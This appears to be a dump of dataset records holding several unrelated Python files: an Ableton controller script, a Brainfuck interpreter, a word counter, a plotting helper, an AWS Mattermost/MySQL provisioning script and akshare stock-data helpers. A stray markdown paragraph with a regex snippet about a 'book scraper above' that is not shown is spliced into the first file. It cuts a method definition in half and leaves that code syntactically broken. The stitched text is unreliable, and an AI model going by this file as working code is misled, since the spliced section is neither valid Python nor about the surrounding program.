_Framework.ControlSurface import ControlSurface\nfrom Matrix_Maps import *\nfrom VUMeters import VUMeters\n\nclass MatrixModesComponent(ModeSelectorComponent):\n ' SelectorComponent that assigns matrix to different functions '\n __module__ = __name__\n\n def __init__(self, matrix, session, zooming, stop_buttons, parent):\n assert isinstance(matrix, ButtonMatrixElement)\n ModeSelectorComponent.__init__(self)\n self._controls = None\n self._session = session\n self._session_zoom = zooming\n self._matrix = matrix\n self._track_stop_buttons = stop_buttons\n self._stop_button_matrix = ButtonMatrixElement() #new dummy matrix for stop buttons, to allow note mode/user mode switching\n button_row = []\n for track_index in range(8):\n button = self._track_stop_buttons[track_index]\n button_row.append(button)\n self._stop_button_matrix.add_row(tuple(button_row))\n self._nav_left_button = None\n self._nav_right_button = None\n self._mode_index = 0\n self._last_mode = 0\n self._parent = parent\n self._parent.set_pad_translations(PAD_TRANSLATIONS) #comment out to remove Drum Rack mapping\n self._vu = None\n self._shift_button = self._parent._shift_button\n self._shift_button.add_value_listener(self._shift_value)\n\n \n def disconnect(self):\n for button in self._modes_buttons:\n button.remove_value_listener(self._mode_value)\n self._controls = None\n self._session = None\n self._session_zoom = None\n self._matrix = None\n self._track_stop_buttons = None\n self._stop_button_matrix = None\n self._shift_button.remove_value_listener(self._shift_value)\n ModeSelectorComponent.disconnect(self)\n\n \n def 
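In the book scraper above, bookDataRetrieve extracts the stock count by looping over every character of the availability text. Assuming books.toscrape.com renders it as e.g. 'In stock (22 available)' — the format implied by that loop — a single regex does the same job more robustly:

```python
import re

available_txt = 'In stock (22 available)'  # illustrative sample text

# One search replaces the per-character digit loop in bookDataRetrieve.
match = re.search(r'\((\d+) available\)', available_txt)
stock = match.group(1) if match else '0'
assert stock == '22'
```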
set_mode(self, mode): #override ModeSelectorComponent set_mode, to avoid flickers\n assert isinstance(mode, int)\n assert (mode in range(self.number_of_modes()))\n if (self._mode_index != mode):\n self._last_mode = 0 # self._mode_index # keep track of previous mode, to allow refresh after Note Mode only\n self._mode_index = mode\n self._set_modes()\n \n \n def set_mode_buttons(self, buttons):\n assert isinstance(buttons, (tuple,\n type(None)))\n for button in self._modes_buttons:\n button.remove_value_listener(self._mode_value)\n\n self._modes_buttons = []\n if (buttons != None):\n for button in buttons:\n assert isinstance(button, ButtonElement)\n identify_sender = True\n button.add_value_listener(self._mode_value, identify_sender)\n self._modes_buttons.append(button)\n for index in range(len(self._modes_buttons)):\n if (index == self._mode_index):\n self._modes_buttons[index].turn_on()\n else:\n self._modes_buttons[index].turn_off()\n\n\n def _mode_value(self, value, sender):\n assert (len(self._modes_buttons) > 0)\n assert isinstance(value, int)\n assert isinstance(sender, ButtonElement)\n assert (self._modes_buttons.count(sender) == 1)\n if self.is_enabled():\n if ((value is not 0) or (not sender.is_momentary())):\n self.set_mode(self._modes_buttons.index(sender)) \n\n def number_of_modes(self):\n return 8\n \n def update(self):\n pass\n\n def get_mode_index_value(self):\n return self._mode_index\n \n def _set_modes(self):\n if self.is_enabled():\n if self._vu != None:\n self._vu.disconnect()\n \n self._session.set_allow_update(False)\n self._session_zoom.set_allow_update(False)\n assert (self._mode_index in range(self.number_of_modes()))\n for index in range(len(self._modes_buttons)):\n if (index == self._mode_index):\n self._modes_buttons[index].turn_on()\n else:\n self._modes_buttons[index].turn_off()\n self._session.set_stop_track_clip_buttons(tuple(self._track_stop_buttons)) \n for track_index in range(8):\n button = self._track_stop_buttons[track_index]\n button.use_default_message()\n button.set_enabled(True)\n button.set_force_next_value()\n button.send_value(0)\n self._session_zoom.set_enabled(True)\n self._session.set_enabled(True)\n self._session.set_show_highlight(True)\n self._session_zoom.set_zoom_button(self._parent._shift_button)\n for scene_index in range(5):\n scene = self._session.scene(scene_index) \n for track_index in range(8): \n button = self._matrix.get_button(track_index, scene_index)\n button.use_default_message()\n clip_slot = scene.clip_slot(track_index)\n clip_slot.set_launch_button(button)\n button.set_enabled(True)\n \n if (self._mode_index == 0): #Clip Launch\n self._session_zoom._on_zoom_value(1) #zoom out\n\n \n elif (self._mode_index == 1): #Session Overview\n self._session_zoom.set_zoom_button(None)\n self._session_zoom.set_enabled(True)\n self._session_zoom._is_zoomed_out = True\n self._session_zoom._scene_bank_index = int(((self._session_zoom._session.scene_offset() / self._session_zoom._session.height()) / self._session_zoom._buttons.height())) \n self._session.set_enabled(False)\n self._session_zoom.update()\n\n \n elif (self._mode_index == 2):\n self._set_note_mode(PATTERN_1, CHANNEL_1, NOTEMAP_1, USE_STOP_ROW_1, IS_NOTE_MODE_1)\n elif (self._mode_index == 3):\n self._set_note_mode(PATTERN_2, CHANNEL_2, NOTEMAP_2, USE_STOP_ROW_2, IS_NOTE_MODE_2)\n elif (self._mode_index == 4):\n self._set_note_mode(PATTERN_3, CHANNEL_3, NOTEMAP_3, USE_STOP_ROW_3, IS_NOTE_MODE_3)\n elif (self._mode_index == 5):\n self._set_note_mode(PATTERN_4, CHANNEL_4, 
NOTEMAP_4, USE_STOP_ROW_4, IS_NOTE_MODE_4)\n elif (self._mode_index == 6):\n self._set_note_mode(PATTERN_5, CHANNEL_5, NOTEMAP_5, USE_STOP_ROW_5, IS_NOTE_MODE_5)\n elif (self._mode_index == 7):\n self._set_note_mode(PATTERN_6, CHANNEL_6, NOTEMAP_6, True, False)\n # VU Meters\n self._session.set_enabled(False)\n self._session_zoom._on_zoom_value(1) #zoom out\n self._session_zoom.set_enabled(True)\n self._session_zoom._is_zoomed_out = False\n self._session_zoom.set_zoom_button(self._parent._shift_button)\n self._session_zoom.update()\n self._update_vu_meters()\n\n else:\n pass\n self._session.set_allow_update(True)\n self._session_zoom.set_allow_update(True)\n #self._rebuild_callback()\n\n\n def _set_note_mode(self, pattern, channel, notemap, use_stop_row = False, is_note_mode = True):\n self._session_zoom.set_zoom_button(None)\n self._session_zoom.set_enabled(False)\n for scene_index in range(5):\n scene = self._session.scene(scene_index) \n for track_index in range(8):\n clip_slot = scene.clip_slot(track_index)\n button = self._matrix.get_button(track_index, scene_index)\n clip_slot.set_launch_button(None)\n button.set_channel(channel) #remap all Note Mode notes to new channel\n button.set_identifier(notemap[scene_index][track_index])\n button.set_on_off_values(pattern[scene_index][track_index], 0)\n button.set_force_next_value()\n button.turn_on()\n if is_note_mode == True:\n button.set_enabled(False)\n if use_stop_row == True:\n self._session.set_stop_track_clip_buttons(None)\n for track_index in range(8):\n button = self._stop_button_matrix.get_button(track_index, 0)\n button.set_channel(channel) #remap all Note Mode notes to new channel\n button.set_identifier(notemap[5][track_index])\n button.set_force_next_value()\n button.send_value(pattern[5][track_index])\n if is_note_mode == True:\n button.set_enabled(False)\n else:\n for track_index in range(8):\n button = self._stop_button_matrix.get_button(track_index, 0)\n button.send_value(0, True)\n self._session.set_enabled(True)\n self._session.set_show_highlight(True)\n\n\n def _on_track_offset_changed(self):\n if (self.is_enabled() and self._mode_index == 7):\n self._update_vu_meters()\n\n def _shift_value(self, value):\n if (self.is_enabled() and self._mode_index == 7 and self._vu != None):\n if value != 0:\n self._vu.disconnect()\n self._vu.disable()\n else:\n self._update_vu_meters()\n self._vu.enable()\n\n \n def _update_vu_meters(self):\n if self._vu == None:\n self._vu = VUMeters(self._parent)\n else:\n self._vu.disconnect()\n self._vu.observe( int(self._session_zoom._session.track_offset()) )\n\n \n\n# local variables:\n# tab-width: 4\n","repo_name":"matthewcieplak/APC_64_40_9","sub_path":"MatrixModesComponent.py","file_name":"MatrixModesComponent.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"27085745696","text":"__author__ = \"Erik Nyquist\"\n__license__ = \"Apache 2.0\"\n__version__ = \"1.0.4\"\n__maintainer__ = \"Erik Nyquist\"\n__email__ = \"eknyquist@gmail.com\"\n\n\nimport os\nimport sys\nimport time\n\nOPCODE_MOVE = 0\nOPCODE_LEFT = 1\nOPCODE_RIGHT = 2\nOPCODE_ADD = 3\nOPCODE_SUB = 4\nOPCODE_OPEN = 5\nOPCODE_CLOSE = 6\nOPCODE_INPUT = 7\nOPCODE_OUTPUT = 8\nOPCODE_CLEAR = 9\nOPCODE_COPY = 10\nOPCODE_SCANL = 11\nOPCODE_SCANR = 12\n\nopcode_map = {\n \"<\": OPCODE_LEFT,\n \">\": OPCODE_RIGHT,\n \"+\": OPCODE_ADD,\n \"-\": OPCODE_SUB,\n \"[\": OPCODE_OPEN,\n \"]\": OPCODE_CLOSE,\n \",\": OPCODE_INPUT,\n \".\": 
OPCODE_OUTPUT,\n}\n\n# Check for string type in Python 2x and 3x\ntry:\n isinstance(\"\", basestring)\n def _isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def _isstr(s):\n return isinstance(s, str)\n\nclass BrainfuckSyntaxError(Exception):\n \"\"\"\n Raised when brainfuck source contains invalid syntax\n \"\"\"\n pass\n\nclass Opcode(object):\n \"\"\"\n Brainfuck intermediate representation opcode\n \"\"\"\n\n _name_map = {\n OPCODE_MOVE: \"move\",\n OPCODE_ADD: \"add\",\n OPCODE_SUB: \"sub\",\n OPCODE_OPEN: \"open\",\n OPCODE_CLOSE: \"close\",\n OPCODE_INPUT: \"input\",\n OPCODE_OUTPUT: \"output\",\n OPCODE_CLEAR: \"clear\",\n OPCODE_COPY: \"copy\",\n OPCODE_SCANL: \"scanl\",\n OPCODE_SCANR: \"scanr\"\n }\n\n def __init__(self, code, move=0, value=None):\n self.code = code\n self.value = value\n self.move = move\n\n def __str__(self):\n ret = '%s %d' % (self._name_map[self.code], self.move)\n if self.value is not None:\n ret += ' %s' % self.value\n\n return ret\n\ndef _raise_unmatched(brace):\n raise BrainfuckSyntaxError(\"Error: unmatched '\" + brace + \"' symbol\")\n\ndef _count_dupes_ahead(string, index):\n \"\"\"\n Counts the number of repeated characters in 'string', starting at 'index'\n \"\"\"\n\n ret = 0\n i = index\n end = len(string) - 1\n\n while (i < end) and (string[i + 1] == string[i]):\n i += 1\n ret += 1\n\n return ret\n\ndef _is_copyloop(program, size, index, ii):\n \"\"\"\n Detects a copy loop, or a multiply loop and returns equivalent opcodes\n \"\"\"\n\n # Copy/multiply loop must start with a decrement\n if (index > (size - 6)) or (program[index + 1] != \"-\"):\n return [], 0\n\n mult = 0\n depth = 0\n mults = {}\n i = index + 2\n\n # Consume the loop contents until the cell pointer movement changes\n # direction. 
Keep track of pointer movement, and the number of increments\n # at each cell, so we can create Opcodes to recreate the copy / multiply\n # operations performed by the loop\n while i < size:\n if program[i] in \"><\":\n if mult > 0:\n mults[depth] = mult\n mult = 0\n\n if program[i] == \"<\":\n break\n\n depth += 1\n\n elif program[i] == \"+\":\n mult += 1\n\n else:\n return [], 0\n\n i += 1\n\n # If no cell or pointer increments by now, this isn't a copy/multiply loop\n if (len(mults) == 0) or (depth == 0) or (i == (size - 1)):\n return [], 0\n\n ret = [Opcode(OPCODE_COPY, ii, mults)]\n\n # Consume all the pointer decrements until the end of the loop.\n # If we encounter any non-\"<\" characters in the loop at this stage,\n # this isn't a copy/multiply loop (at least, not one I want to mess with!)\n while (i < size) and (program[i] != \"]\"):\n if program[i] != \"<\":\n return [], 0\n\n depth -= 1\n i += 1\n\n if (depth != 0) or (i == (size - 1)):\n return [], 0\n\n return ret, (i - index) + 1\n\ndef _is_scanloop(program, size, index, ii):\n \"\"\"\n Detects a scan loop and returns equivalent opcodes\n \"\"\"\n\n if index < (size - 3):\n clr = program[index : index + 3]\n\n if clr == \"[>]\":\n return [Opcode(OPCODE_SCANR, ii)], 3\n\n elif clr == \"[<]\":\n return [Opcode(OPCODE_SCANL, ii)], 3\n\n return [], 0\n\ndef _is_clearloop(program, size, index, ii):\n \"\"\"\n Detects a clear loop and returns equivalent opcodes\n \"\"\"\n\n if index < (size - 3):\n clr = program[index : index + 3]\n if clr == \"[+]\" or clr == \"[-]\":\n return [Opcode(OPCODE_CLEAR, ii)], 3\n\n return [], 0\n\ndef _run_optimizers(program, size, index, ii):\n \"\"\"\n Runs all the loop optimizers on the current token, and returns\n the resulting opcodes of the first one that succeeds\n \"\"\"\n\n loop_opts = [\n _is_clearloop, _is_copyloop, _is_scanloop\n ]\n\n for opt in loop_opts:\n codes, chars = opt(program, size, index, ii)\n if chars > 0:\n return codes, chars\n\n return [], 0\n\ndef parse(program):\n \"\"\"\n Convert brainfuck source into some intermediate opcodes that take advantage of\n common brainfuck paradigms to execute more efficiently.\n\n Specifically:\n\n * Strip out whitespace and any other non-BF characters\n * Replace copy loops, multiply loops, clear loops and scan loops with\n a single opcode that acheives the same effect\n * Collapse sequences of repeated \"+\", \"-\", \">\" and \"<\" characters into\n a single opcode\n\n :param str program: Brainfuck source code\n :return: list of intermediate opcodes\n :rtype: [bfi.Opcode]\n \"\"\"\n\n left_positions = []\n opcodes = []\n\n program = ''.join(program.split())\n size = len(program)\n\n pi = 0\n ii = 0\n\n while pi < size:\n if program[pi] not in opcode_map:\n pi += 1\n continue\n\n opcode = opcode_map[program[pi]]\n\n if opcode == OPCODE_OPEN:\n # Optimize common loop constructs\n codes, chars = _run_optimizers(program, size, pi, ii)\n if chars > 0:\n opcodes.extend(codes)\n pi += chars\n ii = 0\n continue\n\n if ii != 0:\n opcodes.append(Opcode(OPCODE_MOVE, 0, ii))\n ii = 0\n\n # No optimization possible, treat as normal BF loop\n left_positions.append(len(opcodes))\n opcodes.append(Opcode(OPCODE_OPEN))\n\n elif opcode == OPCODE_CLOSE:\n if len(left_positions) == 0:\n _raise_unmatched(\"]\")\n\n left = left_positions.pop()\n right = len(opcodes)\n opcodes[left].value = right\n opcodes.append(Opcode(OPCODE_CLOSE, ii, left))\n ii = 0\n\n elif opcode in [OPCODE_INPUT, OPCODE_OUTPUT]:\n opcodes.append(Opcode(opcode_map[program[pi]], ii))\n ii = 
0\n else:\n num = _count_dupes_ahead(program, pi)\n if opcode == OPCODE_LEFT:\n ii -= (num + 1)\n elif opcode == OPCODE_RIGHT:\n ii += (num + 1)\n else:\n opcodes.append(Opcode(opcode_map[program[pi]], ii, num + 1))\n ii = 0\n\n pi += num\n\n pi += 1\n\n if len(left_positions) != 0:\n _raise_unmatched('[')\n\n return opcodes\n\ndef execute(opcodes, input_data=None, time_limit=None, tape_size=30000,\n buffer_output=False, write_byte=None, read_byte=None):\n \"\"\"\n Execute a list of intermediate opcodes\n\n :param [Opcode] opcodes: opcodes to execute\n :param str input_data: input data\n :param float time_limit: execution time limit\n :param int tape_size: Brainfuck program tape size\n :param bool buffer_output: if True, any output generated by the Brainfuck \\\n program will be buffered and returned as a string\n :param callable write_byte: callback to implement custom output behaviour; whenever the '.' \\\n brainfuck opcode is used to output the contents of the current cell, the contents \\\n of the current cell will be passed to this function. Should accept one argument \\\n which is the byte to write as an integer, and return nothing. Overrides the \\\n 'buffer_output' argument.\n :param callable read_byte: callback to implement custom input behaviour; whenever the ',' \\\n brainfuck opcode is used to read input and put it into the current cell, this \\\n function will be called to obtain 1 byte of input. Should accept no arguments, \\\n and return the read byte as an integer. Overrides the 'input_data' argument.\n \"\"\"\n\n stdin_buf = None\n if input_data != None:\n stdin_buf = list(reversed(input_data))\n\n tape = bytearray(tape_size)\n size = len(opcodes)\n ret = []\n pi = 0\n ii = 0\n\n # Pre-bind printing function since we'll call it so frequently. 
This\n    # *did* speed things up very slightly in my tests, could have been a\n    # delusion, I'm leaving it in anyway...\n    syswrite = sys.stdout.write\n    sysflush = sys.stdout.flush\n\n    def write_stdout(c):\n        syswrite(chr(c))\n        sysflush()\n\n    def write_buf(c):\n        ret.append(chr(c))\n\n    def read_stdin():\n        return ord(os.read(0, 1))\n\n    def read_buf():\n        if len(stdin_buf) > 0:\n            return ord(stdin_buf.pop())\n\n        return None\n\n    if write_byte is not None:\n        do_write = write_byte\n    else:\n        do_write = write_buf if buffer_output else write_stdout\n\n    if read_byte is not None:\n        do_read = read_byte\n    else:\n        do_read = read_stdin if stdin_buf is None else read_buf\n\n    if time_limit:\n        start = time.time()\n\n    while ii < size:\n        op = opcodes[ii]\n\n        if op.code == OPCODE_MOVE:\n            pi += op.value\n\n        elif op.code == OPCODE_ADD:\n            pi += op.move\n            tape[pi] = (tape[pi] + op.value) % 256\n\n        elif op.code == OPCODE_SUB:\n            pi += op.move\n            tape[pi] = (tape[pi] - op.value) % 256\n\n        elif op.code == OPCODE_OPEN:\n            pi += op.move\n            if tape[pi] == 0:\n                ii = op.value\n\n        elif op.code == OPCODE_CLOSE:\n            pi += op.move\n            if tape[pi] != 0:\n                ii = op.value - 1\n\n        elif op.code == OPCODE_INPUT:\n            pi += op.move\n            ch = do_read()\n            if (ch is not None) and (ch > 0):\n                tape[pi] = ch\n\n        elif op.code == OPCODE_OUTPUT:\n            pi += op.move\n            do_write(tape[pi])\n\n        elif op.code == OPCODE_CLEAR:\n            pi += op.move\n            tape[pi] = 0\n\n        elif op.code == OPCODE_COPY:\n            pi += op.move\n            if tape[pi] > 0:\n                for off in op.value:\n                    index = pi + off\n                    tape[index] = (tape[index]\n                        + (tape[pi] * op.value[off])) % 256\n\n                tape[pi] = 0\n\n        elif op.code == OPCODE_SCANL:\n            pi += op.move\n            while pi > 0 and tape[pi] != 0:\n                pi -= 1\n\n        elif op.code == OPCODE_SCANR:\n            pi += op.move\n            # scan right is bounded by the tape length, not by the opcode\n            # count ('size' above is len(opcodes), which is unrelated to pi)\n            while pi < (len(tape) - 1) and tape[pi] != 0:\n                pi += 1\n\n        ii += 1\n        if time_limit and ((time.time() - start) >= time_limit):\n            return None\n\n    if (not buffer_output) or (write_byte is not None):\n        return None\n\n    return \"\".join(ret)\n\ndef interpret(program, input_data=None, time_limit=None, tape_size=30000,\n        buffer_output=False, write_byte=None, read_byte=None):\n    \"\"\"\n    Interpret & execute a brainfuck program\n\n    :param str program: Brainfuck source code\n    :param str input_data: input data\n    :param float time_limit: execution time limit\n    :param int tape_size: Brainfuck program tape size\n    :param bool buffer_output: if True, any output generated by the Brainfuck \\\n        program will be buffered and returned as a string\n    :param callable write_byte: callback to implement custom output behaviour; whenever the '.' \\\n        brainfuck opcode is used to output the contents of the current cell, the contents \\\n        of the current cell will be passed to this function. Should accept one argument \\\n        which is the byte to write as an integer, and return nothing. Overrides the \\\n        'buffer_output' argument.\n    :param callable read_byte: callback to implement custom input behaviour; whenever the ',' \\\n        brainfuck opcode is used to read input and put it into the current cell, this \\\n        function will be called to obtain 1 byte of input. Should accept no arguments, \\\n        and return the read byte as an integer. Overrides the 'input_data' argument.\n    \"\"\"\n\n    if not _isstr(program):\n        raise BrainfuckSyntaxError(\"expecting a string containing Brainfuck \"\n            \"code. 
Got %s instead\" % type(program))\n\n    opcodes = parse(program)\n    return execute(opcodes, input_data, time_limit, tape_size, buffer_output, write_byte, read_byte)\n","repo_name":"eriknyquist/bfi","sub_path":"bfi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12730,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"}
{"seq_id":"73317195366","text":"count = 0\n\nfile = open('C:Users/dell/Documents/fille', 'r')\nfor line in file:\n    words = line.split(\" \")\n    # accumulate inside the loop so every line is counted, not just the last one\n    count = count + len(words)\n\nprint(\"Number of words present in given file: \" + str(count));\n\nfile.close();","repo_name":"Ambrose23456/Zuri_Team","sub_path":"Basic Python/numOfWords.py","file_name":"numOfWords.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"33483085050","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport surfaceProject.energycalculations.calcenergy as ce\n\n\"\"\" \nInputs 3D array f(image,atom,feature_vector) \n \nIn separate figures the Ag and O atoms are plotted in the feature space (2D space of surrounding atomic densities). \n\"\"\"\n \ndef plot_features(f):\n    N_images, N_atoms = np.size(f,0), np.size(f,1)\n    for i in range(N_images): # Iterate through images \n        for j in range(N_atoms): # Iterate through atoms in a specific image\n            if f[i,j,2] == 47: # plot Ag\n                plt.figure(1)\n                plt.plot(f[i,j,0],f[i,j,1],\"o\",color=\"blue\")\n            elif f[i,j,2] == 8: # plot O\n                plt.figure(2)\n                plt.plot(f[i,j,0],f[i,j,1],\"o\",color=\"red\")\n    plt.figure(1)\n    plt.title(\"Feature space of Ag atoms\")\n    plt.xlabel(\"density of O atoms\")\n    plt.ylabel(\"density of Ag atoms\")\n    plt.figure(2)\n    plt.title(\"Feature space of O atoms\")\n    plt.xlabel(\"density of O atoms\")\n    plt.ylabel(\"density of Ag atoms\")\n    plt.show()\n","repo_name":"HenrikLundMortensen/surfaceProject","sub_path":"surfaceProject/FeatureVector/plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"7111895834","text":"import logging\nfrom common.config import Configuration\nfrom common.ec2.vpc import Vpc, Vpcs\nfrom common.ec2.subnet import Subnet\nfrom common.ec2.security_group import SecurityGroup\nfrom common.ec2.route_table import RouteTable\nfrom common.ec2.internet_gateway import InternetGateway, InternetGateways\nfrom common.ec2.vpc_address import VpcAddress, VpcAddresses\nfrom common.ec2.nat_gateway import NatGateway, NatGateways\nfrom common.ec2.key_pair import KeyPair, KeyPairs\nfrom common.ec2.instance import Instance\n\nclass CreateAWSResources():\n    def _getVpc() -> Vpc:\n        vpc = Vpcs.getVpc(name=\"Project 1 VPC\", cidr_block='10.0.0.0/16')\n        vpc.wait_until_exists()\n        vpc.wait_until_available()\n        vpc.enableDnsSupport = True\n        vpc.enableDnsHostnames = True\n        return vpc\n\n    def _getTopLevelObjects() -> tuple[InternetGateway,VpcAddress,KeyPair]:\n        return \\\n            InternetGateways.getInternetGateway(name='Project 1 Internet Gateway'), \\\n            VpcAddresses.allocateAddress(name=\"Project 1 Elastic IP\"), \\\n            KeyPairs.getKeyPair(name='glkey')\n\n    def _getSubnets(vpc: Vpc) -> tuple[Subnet, Subnet]:\n        return \\\n            vpc.getSubnet(\n                name = 'Public Subnet', \n                cidr_block = '10.0.1.0/24', \n                availability_zone = Configuration.region_name + \"a\"), \\\n            vpc.getSubnet(\n                name = 'Private Subnet', \n                cidr_block = '10.0.2.0/24', \n                availability_zone = 
Configuration.region_name + \"b\")\n\n def _getRouteTables(vpc: Vpc) -> tuple[RouteTable,RouteTable]:\n return \\\n vpc.getRouteTable(name='Public Route Table'), \\\n vpc.getRouteTable(name='Private Route Table')\n\n def _getSecurityGroups(vpc: Vpc) -> tuple[SecurityGroup, SecurityGroup]:\n return \\\n vpc.getSecurityGroup(name='Project 1 Mattermost Security Group', description=\"Opens SSH, HTTP, HTTPS, Mattermost ports from the internet\"), \\\n vpc.getSecurityGroup(name='Project 1 MySQL Server', description=\"Opens SSH, HTTP, HTTPs, MySQL ports from the public subnet\")\n\n def _getNatGateway(vpc: Vpc, igw: InternetGateway, eipalloc: VpcAddress, subnet: Subnet) -> NatGateway:\n igw.wait_until_gateway_exists()\n igw.attachInternetGateway(vpc)\n natgateway = NatGateways.getNatGateway(eipalloc=eipalloc, subnet=subnet, name='Project 1 NAT Gateway')\n natgateway.wait_until_available()\n return natgateway\n\n def _getInstances(\n vpc: Vpc, \n keypair: KeyPair, \n private_subnet: Subnet, \n public_subnet: Subnet, \n private_sg: SecurityGroup, \n public_sg: SecurityGroup\n ) -> tuple[Instance, Instance]:\n keypair.wait_until_exists()\n private_subnet.wait_until_available()\n private_sg.wait_until_exists()\n mysql_server = vpc.runInstance(\n name = 'Project 1 MySQL Server', \n keypair = keypair, \n subnet = private_subnet, \n sg = private_sg, \n ami_id = Configuration.matterMost_ami_id,\n root_volume_device_name = Configuration.matterMost_root_volume_device_name,\n type = Configuration.matterMost_instance_type, \n ebs_volume_size = Configuration.matterMost_ebs_volume_size,\n bootstrap_file = './bootstrap/mysql-server-centos.sh')\n mysql_server.wait_for_status_ok()\n\n bootstrap_str = ''\n with open('./bootstrap/mattermost-centos.sh') as f: \n bootstrap_str = f.read().format(mysql_server.private_ip_address)\n\n public_subnet.wait_until_available()\n public_subnet.map_public_ip_on_launch = True\n public_sg.wait_until_exists()\n mattermost_server = vpc.runInstance(\n name = 'Project 1 Mattermost Server', \n keypair = keypair, \n subnet = public_subnet, \n sg = public_sg, \n ami_id = Configuration.matterMost_ami_id,\n root_volume_device_name = Configuration.matterMost_root_volume_device_name,\n type = Configuration.matterMost_instance_type, \n ebs_volume_size = Configuration.matterMost_ebs_volume_size,\n bootstrap_str = bootstrap_str)\n \n return mysql_server, mattermost_server\n \n def _wire_everything_up(\n igw: InternetGateway,\n public_rtb: RouteTable, \n private_rtb: RouteTable, \n public_subnet: Subnet, \n private_subnet: Subnet,\n public_sg: SecurityGroup, \n private_sg: SecurityGroup, \n nat_gateway: NatGateway):\n public_sg.authorizeIngress(from_port=22, protocol='tcp', cidr_block='0.0.0.0/0', name='open-ssh-public', description='Opening SSH from the internet', to_port=22)\n public_sg.authorizeIngress(from_port=443, protocol='tcp', cidr_block='0.0.0.0/0', name='open-https-public', description='Opening HTTPS from the internet', to_port=443)\n public_sg.authorizeIngress(from_port=80, protocol='tcp', cidr_block='0.0.0.0/0', name='open-http-public', description='Opening HTTP from the internet', to_port=80)\n public_sg.authorizeIngress(from_port=8065, protocol='tcp', cidr_block='0.0.0.0/0', name='open-mattermost-public', description='Opening Mattermost from the internet', to_port=8065)\n private_sg.authorizeIngress(from_port=22, protocol='tcp', cidr_block='10.0.1.0/24', name='open-ssh-private', description='Opening SSH from the public subnet', to_port=22)\n 
private_sg.authorizeIngress(from_port=80, protocol='tcp', cidr_block='10.0.1.0/24', name='open-http-private', description='Opening HTTP from the public subnet', to_port=80)\n        private_sg.authorizeIngress(from_port=443, protocol='tcp', cidr_block='10.0.1.0/24', name='open-https-private', description='Opening HTTPS from the public subnet', to_port=443)\n        private_sg.authorizeIngress(from_port=3306, protocol='tcp', cidr_block='10.0.1.0/24', name='open-mysql-private', description='Opening MySQL from the public subnet', to_port=3306)\n        public_rtb.addIgwRoute(igw, '0.0.0.0/0')\n        public_rtb.associate_with_subnet(public_subnet)\n        private_rtb.addNatRoute(nat_gateway, '0.0.0.0/0')\n        private_rtb.associate_with_subnet(private_subnet)\n\n    def _wait_for_status_ok(instances):\n        [instance.wait_for_status_ok() for instance in instances]\n\n    def run():\n        vpc = CreateAWSResources._getVpc()\n        igw, eipalloc, keypair = CreateAWSResources._getTopLevelObjects()\n        public_subnet, private_subnet = CreateAWSResources._getSubnets(vpc=vpc)\n        public_rtb, private_rtb = CreateAWSResources._getRouteTables(vpc=vpc)\n        public_sg, private_sg = CreateAWSResources._getSecurityGroups(vpc=vpc) \n        nat_gateway = CreateAWSResources._getNatGateway(vpc=vpc, igw=igw, eipalloc=eipalloc, subnet=public_subnet)\n        mysql_server, mattermost_server = CreateAWSResources._getInstances(\n            vpc=vpc, \n            keypair=keypair, \n            private_subnet=private_subnet, \n            public_subnet=public_subnet, \n            private_sg=private_sg, \n            public_sg=public_sg)\n        CreateAWSResources._wire_everything_up(\n            igw=igw, \n            public_rtb=public_rtb, \n            private_rtb=private_rtb,\n            public_subnet=public_subnet, \n            private_subnet=private_subnet,\n            public_sg=public_sg, \n            private_sg=private_sg, \n            nat_gateway=nat_gateway\n        )\n\n        CreateAWSResources._wait_for_status_ok([mysql_server, mattermost_server])\n\n        logging.info(f'''\n\n            Open web browser to {mattermost_server.public_ip_address}:8065. 
\n\n            ''')","repo_name":"tomdemay/glcloud","sub_path":"projects/week4/option2/create_aws_resources.py","file_name":"create_aws_resources.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"74662668963","text":"import datetime\n\nimport akshare as ak\nimport numpy as np\n\n\ndef attribute_history(security, count, unit='1d', fields=None, skip_paused=True, df=True, fq='qfq'):\n    \"\"\"\n    Fetch historical stock quote data\n    :return: pandas.DataFrame\n    \"\"\"\n    # Map the unit parameter to a pandas frequency string\n    freq_map = {'1d': 'D', '1w': 'W', '1M': 'M'}\n    freq = freq_map[unit]\n    # Current time\n    end_date = datetime.datetime.now()\n    # Compute the start date\n    if unit == '1d':\n        start_date = end_date - datetime.timedelta(days=count)\n    elif unit == '1w':\n        start_date = end_date - datetime.timedelta(weeks=count)\n    elif unit == '1M':\n        # datetime.timedelta has no 'months' argument; approximate one month as 30 days\n        start_date = end_date - datetime.timedelta(days=30 * count)\n    # Fetch the historical quotes\n    print(start_date.strftime('%Y-%m-%d'), end_date.strftime('%Y-%m-%d'))\n    data = ak.stock_zh_a_daily(symbol=security, start_date=start_date.strftime('%Y-%m-%d'),\n                               end_date=end_date.strftime('%Y-%m-%d'), adjust=fq)\n    # Use the date as the index\n    data = data.set_index('date')\n    # Resample the data at the requested frequency\n    data = data.resample(freq).last()\n    # If skip_paused is True, drop days when trading was suspended\n    if skip_paused:\n        paused_dates = data[data['volume'] == 0].index\n        data = data.drop(paused_dates)\n    # Return only the requested fields\n    result = data[list(fields)]\n    return result\n\n\ndef attribute_history_etf(security, count, unit='1d', fields=None, skip_paused=True, df=True, fq='qfq'):\n    \"\"\"\n    Fetch historical ETF quote data\n    :return: pandas.DataFrame\n    \"\"\"\n    # Work out how many raw daily rows are needed from count and unit\n    real_count = 0\n    if unit == '1d':\n        real_count = count * 1\n    elif unit == '1w':\n        real_count = count * 5\n    elif unit == '1M':\n        real_count = count * 21\n\n    # Fetch the historical quotes\n    data = ak.fund_etf_hist_sina(symbol=security)\n    # data.sort_values(by='date', ascending=False, inplace=True)\n    last = data.tail(real_count)\n    last = last[list(fields)]\n    last = last.rename(index={x: x - last.index[0] for x in last.index})\n    return last\n\n\ndef get_current_data(security):\n    \"\"\"\n    Get the current quote 